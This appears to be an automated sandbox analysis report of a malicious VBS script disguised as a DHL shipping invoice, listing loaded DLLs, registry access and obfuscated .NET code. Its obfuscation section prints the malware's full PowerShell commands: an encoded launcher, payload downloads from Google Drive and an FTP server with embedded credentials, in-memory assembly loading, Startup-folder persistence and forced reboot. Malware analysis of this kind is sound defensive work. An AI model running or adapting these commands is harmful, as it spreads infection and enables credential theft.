                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

                    Data Obfuscation

                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' +", "0", "false");
                    Source: 3.2.powershell.exe.2203d996da0.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.powershell.exe.2203c0c0000.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.powershell.exe.2203c568c58.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqb
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' 
+ [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B880942 push E95B7DD0h; ret 1_2_00007FFD9B8809C9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B95235D push 8B485F94h; retf 3_2_00007FFD9B952365
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9523A3 push 8B485F94h; iretd 3_2_00007FFD9B9523AB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B79D2A5 pushad ; iretd 4_2_00007FFD9B79D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B85AB push ebx; ret 4_2_00007FFD9B8B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B859D push ebx; ret 4_2_00007FFD9B8B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B84FA push ebx; ret 4_2_00007FFD9B8B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B851B push ebx; ret 4_2_00007FFD9B8B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B77D2A5 pushad ; iretd 5_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8985AB push ebx; ret 5_2_00007FFD9B8985AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B89859D push ebx; ret 5_2_00007FFD9B8985AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8984FA push ebx; ret 5_2_00007FFD9B89851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B89851B push ebx; ret 5_2_00007FFD9B89851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B8915C5 pushad ; ret 8_2_00007FFD9B89160D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B8A613C push ebp; ret 13_2_00007FFD9B8A61D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002806 push ecx; ret 21_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10009FD8 push esi; ret 21_2_10009FD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00457186 push ecx; ret 23_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041C7F3 push eax; retf 23_2_0041C7FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00457AA8 push eax; ret 23_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00434EB6 push ecx; ret 23_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044693D push ecx; ret 29_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00451D54 push eax; ret 29_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00444E71 push ecx; ret 30_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414060 push eax; ret 31_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414060 push eax; ret 31_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414039 push ecx; ret 31_2_00414049
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
